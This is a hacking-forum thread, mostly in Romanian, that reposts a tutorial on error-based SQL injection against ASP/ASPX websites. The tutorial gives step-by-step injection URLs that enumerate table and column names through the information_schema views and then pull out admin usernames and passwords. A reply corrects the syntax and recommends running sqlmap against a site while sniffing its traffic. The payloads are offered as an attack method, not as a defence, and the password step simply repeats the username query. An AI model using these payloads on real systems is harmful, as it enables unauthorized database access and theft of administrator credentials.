Jump to content
Individual14xxx

Hacking ASP/ASPX sites - Aspx Injection

Recommended Posts

Mi-sa parut util , sincer nu l-am mai vazut postat..

Hacking ASP/ASPX sites

ASPX injection is also similar to PHP based sql injection. But here, we don't use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.

Step 1: Find Out A Vulnerable Link

First, we need find out a vulnerable asp/aspx link which looks like

www.vulnerablesite.com/gallery.aspx?id=10

when i browse my actual link, i get the page as shown in the figure.

f11.png

Step 2: Checking For Vulnerability

As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.

www.vulnerablesite.com/gallery.aspx?id=10'

If it gives an error similar to the following, then our site is vulnerable to sql injection.

ferror.png

In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names,column names and then we will extract the data.

Step 3: Finding Out The Table Names.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))

The above code executes the second query and retrieves the first table name from the database. the windows server cant convert character value into data type. so we will get an error as shown in the following figure from which we can get the first table name.

f12.png

But this may not be the desired table for us. So we need to find out the next table name in the database.

For that, we will use the following query.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name')))

replace the first_table_name with the actual table name we got above.

f18.png

Now we will get the second table name as shown in the figure. Still if we don't get our desired table, we will continue the procedure until we get the desired table name. Now the query looks like

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))

Replace first_table_name and second_table_name with the table names we got in the above steps.

f13.png

Step 4: Finding Out The Columns

Now we got the admin table. So we need to find out the columns now.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table'))

Replace admin_table with the table name we got. In our case, it is "vw_system_admin"

f14.png

If the first column is not related to our desired column names, then follow the steps as we have done in step 3.

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))

Replace first_column_name with the column name we got.

f15.png

f16.png

Step 5:Extracting The Data

After finding out all the columns, we need to extract the data such as user names and passwords.

For that, we use the following query

For user name,

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

f17.png

For password,

www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))

f17.png

Sursa: Hacking ASP/ASPX Websites - SQL Injecton Part 6 | 101hacker

LE: Multumesc Maximus.

Edited by Individual14xxx
Link to post
Share on other sites

Vezi ca ai o greseala in sintaxa care iti returneaza numele celei de a doua tabele. In loc de

[url]www.vulnerablesite.com/gallery.aspx?id=10[/url] and 1=convert(int,(select [COLOR="#FF0000"]top1[/COLOR] table_name from information_schema.tables where table_name not in ('first_table_name')))
replace the first_table_name with the actual table name we got above.

trebuie sa fie

[url]www.vulnerablesite.com/gallery.aspx?id=10[/url] and 1=convert(int,(select [COLOR="#FF0000"]top 1[/COLOR] table_name from information_schema.tables where table_name not in ('first_table_name')))
replace the first_table_name with the actual table name we got above.

Un mod mai neconventional de a invata SQLi este sa exploatezi un site cu sqlmap si sa faci sniffing cu wireshark/tcpdump. Dupa aceea poti vedea toti vectorii de atac care au fost folositi.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...